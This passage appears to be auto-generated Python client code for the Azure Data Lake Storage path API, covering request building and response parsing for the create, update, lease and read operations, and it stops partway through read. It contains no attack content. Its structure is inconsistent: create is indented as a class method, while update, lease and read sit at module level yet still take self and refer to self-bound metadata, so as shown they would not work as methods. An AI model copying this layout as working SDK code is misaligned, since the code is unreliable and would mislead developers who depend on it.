         for a directory and 0666 for a file. The default umask is 0027. The umask must be specified
         in 4-digit octal notation (e.g. 0766).
        :type umask: str
        :param path_http_headers: Parameter group.
        :type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
        :param lease_access_conditions: Parameter group.
        :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
        :param modified_access_conditions: Parameter group.
        :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
        :param source_modified_access_conditions: Parameter group.
        :type source_modified_access_conditions: ~azure.storage.filedatalake.models.SourceModifiedAccessConditions
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        # Flatten the optional parameter-group objects into the individual
        # values that become request headers below.
        _cache_control = None
        _content_encoding = None
        _content_language = None
        _content_disposition = None
        _content_type = None
        _lease_id = None
        _if_match = None
        _if_none_match = None
        _if_modified_since = None
        _if_unmodified_since = None
        _source_if_match = None
        _source_if_none_match = None
        _source_if_modified_since = None
        _source_if_unmodified_since = None
        if lease_access_conditions is not None:
            _lease_id = lease_access_conditions.lease_id
        if modified_access_conditions is not None:
            _if_match = modified_access_conditions.if_match
            _if_none_match = modified_access_conditions.if_none_match
            _if_modified_since = modified_access_conditions.if_modified_since
            _if_unmodified_since = modified_access_conditions.if_unmodified_since
        if path_http_headers is not None:
            _cache_control = path_http_headers.cache_control
            _content_encoding = path_http_headers.content_encoding
            _content_language = path_http_headers.content_language
            _content_disposition = path_http_headers.content_disposition
            _content_type = path_http_headers.content_type
        if source_modified_access_conditions is not None:
            _source_if_match = source_modified_access_conditions.source_if_match
            _source_if_none_match = source_modified_access_conditions.source_if_none_match
            _source_if_modified_since = source_modified_access_conditions.source_if_modified_since
            _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
        accept = "application/json"
        # Construct URL
        url = self.create.metadata['url']  # type: ignore
        path_format_arguments = {
            'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        if timeout is not None:
            query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
        if resource is not None:
            query_parameters['resource'] = self._serialize.query("resource", resource, 'str')
        if continuation is not None:
            query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
        if mode is not None:
            query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
        # Construct headers (each optional value is emitted only when set)
        header_parameters = {}  # type: Dict[str, Any]
        if request_id_parameter is not None:
            header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
        header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
        if _cache_control is not None:
            header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
        if _content_encoding is not None:
            header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
        if _content_language is not None:
            header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
        if _content_disposition is not None:
            header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
        if _content_type is not None:
            header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
        if rename_source is not None:
            header_parameters['x-ms-rename-source'] = self._serialize.header("rename_source", rename_source, 'str')
        if _lease_id is not None:
            header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
        if source_lease_id is not None:
            header_parameters['x-ms-source-lease-id'] = self._serialize.header("source_lease_id", source_lease_id, 'str')
        if properties is not None:
            header_parameters['x-ms-properties'] = self._serialize.header("properties", properties, 'str')
        if permissions is not None:
            header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
        if umask is not None:
            header_parameters['x-ms-umask'] = self._serialize.header("umask", umask, 'str')
        if _if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
        if _if_none_match is not None:
            header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
        if _if_modified_since is not None:
            header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
        if _if_unmodified_since is not None:
            header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
        if _source_if_match is not None:
            header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", _source_if_match, 'str')
        if _source_if_none_match is not None:
            header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", _source_if_none_match, 'str')
        if _source_if_modified_since is not None:
            header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", _source_if_modified_since, 'rfc-1123')
        if _source_if_unmodified_since is not None:
            header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", _source_if_unmodified_since, 'rfc-1123')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Send the PUT request synchronously through the client pipeline.
        request = self._client.put(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # The service returns 201 Created on success; anything else is an error.
        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.StorageError, response)
            raise HttpResponseError(response=response, model=error)
        response_headers = {}
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
        response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
        if cls:
            return cls(pipeline_response, None, response_headers)
    create.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def update(
    self,
    action,  # type: Union[str, "_models.PathUpdateAction"]
    mode,  # type: Union[str, "_models.PathSetAccessControlRecursiveMode"]
    body,  # type: IO
    request_id_parameter=None,  # type: Optional[str]
    timeout=None,  # type: Optional[int]
    max_records=None,  # type: Optional[int]
    continuation=None,  # type: Optional[str]
    force_flag=None,  # type: Optional[bool]
    position=None,  # type: Optional[int]
    retain_uncommitted_data=None,  # type: Optional[bool]
    close=None,  # type: Optional[bool]
    content_length=None,  # type: Optional[int]
    properties=None,  # type: Optional[str]
    owner=None,  # type: Optional[str]
    group=None,  # type: Optional[str]
    permissions=None,  # type: Optional[str]
    acl=None,  # type: Optional[str]
    path_http_headers=None,  # type: Optional["_models.PathHTTPHeaders"]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> Optional["_models.SetAccessControlRecursiveResponse"]
    """Append Data | Flush Data | Set Properties | Set Access Control.

    Uploads data to be appended to a file, flushes (writes) previously uploaded data to a file,
    sets properties for a file or directory, or sets access control for a file or directory. Data
    can only be appended to a file. This operation supports conditional HTTP requests. For more
    information, see `Specifying Conditional Headers for Blob Service Operations
    <https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
    blob-service-operations>`_.

    :param action: The action must be "append" to upload data to be appended to a file, "flush" to
     flush previously uploaded data to a file, "setProperties" to set the properties of a file or
     directory, "setAccessControl" to set the owner, group, permissions, or access control list for
     a file or directory, or "setAccessControlRecursive" to set the access control list for a
     directory recursively. Note that Hierarchical Namespace must be enabled for the account in
     order to use access control. Also note that the Access Control List (ACL) includes permissions
     for the owner, owning group, and others, so the x-ms-permissions and x-ms-acl request headers
     are mutually exclusive.
    :type action: str or ~azure.storage.filedatalake.models.PathUpdateAction
    :param mode: Mode "set" sets POSIX access control rights on files and directories, "modify"
     modifies one or more POSIX access control rights that pre-exist on files and directories,
     "remove" removes one or more POSIX access control rights that were present earlier on files
     and directories.
    :type mode: str or ~azure.storage.filedatalake.models.PathSetAccessControlRecursiveMode
    :param body: Initial data.
    :type body: IO
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param max_records: Optional. Valid for "SetAccessControlRecursive" operation. It specifies the
     maximum number of files or directories on which the acl change will be applied. If omitted or
     greater than 2,000, the request will process up to 2,000 items.
    :type max_records: int
    :param continuation: Optional. The number of paths processed with each invocation is limited.
     If the number of paths to be processed exceeds this limit, a continuation token is returned in
     the response header x-ms-continuation. When a continuation token is returned in the response,
     it must be percent-encoded and specified in a subsequent invocation of the
     setAccessControlRecursive operation.
    :type continuation: str
    :param force_flag: Optional. Valid for "SetAccessControlRecursive" operation. If set to false,
     the operation will terminate quickly on encountering user errors (4XX). If true, the operation
     will ignore user errors and proceed with the operation on other sub-entities of the directory.
     Continuation token will only be returned when forceFlag is true in case of user errors. If not
     set the default value is false for this.
    :type force_flag: bool
    :param position: This parameter allows the caller to upload data in parallel and control the
     order in which it is appended to the file.  It is required when uploading data to be appended
     to the file and when flushing previously uploaded data to the file.  The value must be the
     position where the data is to be appended.  Uploaded data is not immediately flushed, or
     written, to the file.  To flush, the previously uploaded data must be contiguous, the position
     parameter must be specified and equal to the length of the file after all data has been
     written, and there must not be a request entity body included with the request.
    :type position: long
    :param retain_uncommitted_data: Valid only for flush operations.  If "true", uncommitted data
     is retained after the flush operation completes; otherwise, the uncommitted data is deleted
     after the flush operation.  The default is false.  Data at offsets less than the specified
     position are written to the file when flush succeeds, but this optional parameter allows data
     after the flush position to be retained for a future flush operation.
    :type retain_uncommitted_data: bool
    :param close: Azure Storage Events allow applications to receive notifications when files
     change. When Azure Storage Events are enabled, a file changed event is raised. This event has a
     property indicating whether this is the final change to distinguish the difference between an
     intermediate flush to a file stream and the final close of a file stream. The close query
     parameter is valid only when the action is "flush" and change notifications are enabled. If the
     value of close is "true" and the flush operation completes successfully, the service raises a
     file change notification with a property indicating that this is the final update (the file
     stream has been closed). If "false" a change notification is raised indicating the file has
     changed. The default is false. This query parameter is set to true by the Hadoop ABFS driver to
     indicate that the file stream has been closed.".
    :type close: bool
    :param content_length: Required for "Append Data" and "Flush Data".  Must be 0 for "Flush
     Data".  Must be the length of the request content in bytes for "Append Data".
    :type content_length: long
    :param properties: Optional. User-defined properties to be stored with the filesystem, in the
     format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...", where each value
     is a base64 encoded string. Note that the string may only contain ASCII characters in the
     ISO-8859-1 character set.  If the filesystem exists, any properties not included in the list
     will be removed.  All properties are removed if the header is omitted.  To merge new and
     existing properties, first get all existing properties and the current E-Tag, then make a
     conditional request with the E-Tag and include values for all properties.
    :type properties: str
    :param owner: Optional. The owner of the blob or directory.
    :type owner: str
    :param group: Optional. The owning group of the blob or directory.
    :type group: str
    :param permissions: Optional and only valid if Hierarchical Namespace is enabled for the
     account. Sets POSIX access permissions for the file owner, the file owning group, and others.
     Each class may be granted read, write, or execute permission.  The sticky bit is also
     supported.  Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
    :type permissions: str
    :param acl: Sets POSIX access control rights on files and directories. The value is a comma-
     separated list of access control entries. Each access control entry (ACE) consists of a scope,
     a type, a user or group identifier, and permissions in the format
     "[scope:][type]:[id]:[permissions]".
    :type acl: str
    :param path_http_headers: Parameter group.
    :type path_http_headers: ~azure.storage.filedatalake.models.PathHTTPHeaders
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: SetAccessControlRecursiveResponse, or the result of cls(response)
    :rtype: ~azure.storage.filedatalake.models.SetAccessControlRecursiveResponse or None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.SetAccessControlRecursiveResponse"]]
    # Map well-known HTTP failure codes to azure-core exception types; callers
    # may extend/override the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group objects into the individual values
    # that are serialized onto the request; each stays None when its group is
    # not supplied, so the corresponding header is simply omitted below.
    _content_md5 = None
    _lease_id = None
    _cache_control = None
    _content_type = None
    _content_disposition = None
    _content_encoding = None
    _content_language = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    if path_http_headers is not None:
        _content_md5 = path_http_headers.content_md5
        _cache_control = path_http_headers.cache_control
        _content_type = path_http_headers.content_type
        _content_disposition = path_http_headers.content_disposition
        _content_encoding = path_http_headers.content_encoding
        _content_language = path_http_headers.content_language
    content_type = kwargs.pop("content_type", "application/octet-stream")
    accept = "application/json"

    # Construct URL
    url = self.update.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters ('action' and 'mode' are required; the rest are
    # only added when explicitly provided).
    query_parameters = {}  # type: Dict[str, Any]
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
    query_parameters['action'] = self._serialize.query("action", action, 'str')
    if max_records is not None:
        query_parameters['maxRecords'] = self._serialize.query("max_records", max_records, 'int', minimum=1)
    if continuation is not None:
        query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
    query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
    if force_flag is not None:
        query_parameters['forceFlag'] = self._serialize.query("force_flag", force_flag, 'bool')
    if position is not None:
        query_parameters['position'] = self._serialize.query("position", position, 'long')
    if retain_uncommitted_data is not None:
        query_parameters['retainUncommittedData'] = self._serialize.query("retain_uncommitted_data", retain_uncommitted_data, 'bool')
    if close is not None:
        query_parameters['close'] = self._serialize.query("close", close, 'bool')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    if content_length is not None:
        header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
    if _content_md5 is not None:
        header_parameters['x-ms-content-md5'] = self._serialize.header("content_md5", _content_md5, 'bytearray')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if _cache_control is not None:
        header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
    if _content_type is not None:
        header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
    if _content_disposition is not None:
        header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
    if _content_encoding is not None:
        header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
    if _content_language is not None:
        header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
    if properties is not None:
        header_parameters['x-ms-properties'] = self._serialize.header("properties", properties, 'str')
    if owner is not None:
        header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
    if group is not None:
        header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
    if permissions is not None:
        header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
    if acl is not None:
        header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # The request body is passed through as a stream (PATCH verb).
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['stream_content'] = body
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200, 202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    response_headers = {}
    deserialized = None
    if response.status_code == 200:
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
        response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
        response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
        response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
        response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
        response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
        response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
        response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
        response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
        response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
        response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        # Only a 200 carries a SetAccessControlRecursiveResponse body; a 202
        # (e.g. accepted append) returns headers only, so 'deserialized'
        # stays None in that case.
        deserialized = self._deserialize('SetAccessControlRecursiveResponse', pipeline_response)

    if response.status_code == 202:
        response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))

    if cls:
        return cls(pipeline_response, deserialized, response_headers)

    return deserialized
update.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def lease(
    self,
    x_ms_lease_action,  # type: Union[str, "_models.PathLeaseAction"]
    request_id_parameter=None,  # type: Optional[str]
    timeout=None,  # type: Optional[int]
    x_ms_lease_duration=None,  # type: Optional[int]
    x_ms_lease_break_period=None,  # type: Optional[int]
    proposed_lease_id=None,  # type: Optional[str]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Lease Path.

    Create and manage a lease to restrict write and delete access to the path. This operation
    supports conditional HTTP requests.  For more information, see `Specifying Conditional Headers
    for Blob Service Operations <https://docs.microsoft.com/en-
    us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.

    :param x_ms_lease_action: There are five lease actions: "acquire", "break", "change", "renew",
     and "release". Use "acquire" and specify the "x-ms-proposed-lease-id" and "x-ms-lease-duration"
     to acquire a new lease. Use "break" to break an existing lease. When a lease is broken, the
     lease break period is allowed to elapse, during which time no lease operation except break and
     release can be performed on the file. When a lease is successfully broken, the response
     indicates the interval in seconds until a new lease can be acquired. Use "change" and specify
     the current lease ID in "x-ms-lease-id" and the new lease ID in "x-ms-proposed-lease-id" to
     change the lease ID of an active lease. Use "renew" and specify the "x-ms-lease-id" to renew an
     existing lease. Use "release" and specify the "x-ms-lease-id" to release a lease.
    :type x_ms_lease_action: str or ~azure.storage.filedatalake.models.PathLeaseAction
    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param x_ms_lease_duration: The lease duration is required to acquire a lease, and specifies
     the duration of the lease in seconds.  The lease duration must be between 15 and 60 seconds or
     -1 for infinite lease.
    :type x_ms_lease_duration: int
    :param x_ms_lease_break_period: The lease break period duration is optional to break a lease,
     and  specifies the break period of the lease in seconds.  The lease break  duration must be
     between 0 and 60 seconds.
    :type x_ms_lease_break_period: int
    :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
     400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
     Constructor (String) for a list of valid GUID string formats.
    :type proposed_lease_id: str
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known HTTP failure codes to azure-core exception types; callers
    # may extend/override the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group objects into the individual values
    # serialized onto the request; each stays None (header omitted) when its
    # group is not supplied.
    _lease_id = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
        _if_none_match = modified_access_conditions.if_none_match
        _if_modified_since = modified_access_conditions.if_modified_since
        _if_unmodified_since = modified_access_conditions.if_unmodified_since
    accept = "application/json"

    # Construct URL
    url = self.lease.metadata['url']  # type: ignore
    path_format_arguments = {
        'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    if timeout is not None:
        query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

    # Construct headers ('x-ms-lease-action' is required; others optional)
    header_parameters = {}  # type: Dict[str, Any]
    if request_id_parameter is not None:
        header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
    header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
    header_parameters['x-ms-lease-action'] = self._serialize.header("x_ms_lease_action", x_ms_lease_action, 'str')
    if x_ms_lease_duration is not None:
        header_parameters['x-ms-lease-duration'] = self._serialize.header("x_ms_lease_duration", x_ms_lease_duration, 'int')
    if x_ms_lease_break_period is not None:
        header_parameters['x-ms-lease-break-period'] = self._serialize.header("x_ms_lease_break_period", x_ms_lease_break_period, 'int')
    if _lease_id is not None:
        header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
    if proposed_lease_id is not None:
        header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
    if _if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
    if _if_none_match is not None:
        header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
    if _if_modified_since is not None:
        header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
    if _if_unmodified_since is not None:
        header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.post(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200, 201, 202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(_models.StorageError, response)
        raise HttpResponseError(response=response, model=error)

    # Each success code carries a slightly different header set; note that
    # 202 ("break" accepted) returns x-ms-lease-time instead of x-ms-lease-id.
    response_headers = {}
    if response.status_code == 200:
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))

    if response.status_code == 201:
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))

    if response.status_code == 202:
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['x-ms-lease-time']=self._deserialize('str', response.headers.get('x-ms-lease-time'))

    if cls:
        return cls(pipeline_response, None, response_headers)

lease.metadata = {'url': '/{filesystem}/{path}'}  # type: ignore
def read(
    self,
    request_id_parameter=None,  # type: Optional[str]
    timeout=None,  # type: Optional[int]
    range=None,  # type: Optional[str]
    x_ms_range_get_content_md5=None,  # type: Optional[bool]
    lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
    modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
    **kwargs  # type: Any
):
    # type: (...) -> IO
    """Read File.

    Read the contents of a file.  For read operations, range requests are supported. This operation
    supports conditional HTTP requests.  For more information, see `Specifying Conditional Headers
    for Blob Service Operations <https://docs.microsoft.com/en-
    us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.

    :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
     limit that is recorded in the analytics logs when storage analytics logging is enabled.
    :type request_id_parameter: str
    :param timeout: The timeout parameter is expressed in seconds. For more information, see
     :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
     timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
    :type timeout: int
    :param range: The HTTP Range request header specifies one or more byte ranges of the resource
     to be retrieved.
    :type range: str
    :param x_ms_range_get_content_md5: Optional. When this header is set to "true" and specified
     together with the Range header, the service returns the MD5 hash for the range, as long as the
     range is less than or equal to 4MB in size. If this header is specified without the Range
     header, the service returns status code 400 (Bad Request). If this header is set to true when
     the range exceeds 4 MB in size, the service returns status code 400 (Bad Request).
    :type x_ms_range_get_content_md5: bool
    :param lease_access_conditions: Parameter group.
    :type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
    :param modified_access_conditions: Parameter group.
    :type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: IO, or the result of cls(response)
    :rtype: IO
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[IO]
    # Map well-known HTTP failure codes to azure-core exception types; callers
    # may extend/override the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    # Flatten the optional parameter-group objects into the individual values
    # serialized onto the request; each stays None (header omitted) when its
    # group is not supplied.
    _lease_id = None
    _if_match = None
    _if_none_match = None
    _if_modified_since = None
    _if_unmodified_since = None
    if lease_access_conditions is not None:
        _lease_id = lease_access_conditions.lease_id
    if modified_access_conditions is not None:
        _if_match = modified_access_conditions.if_match
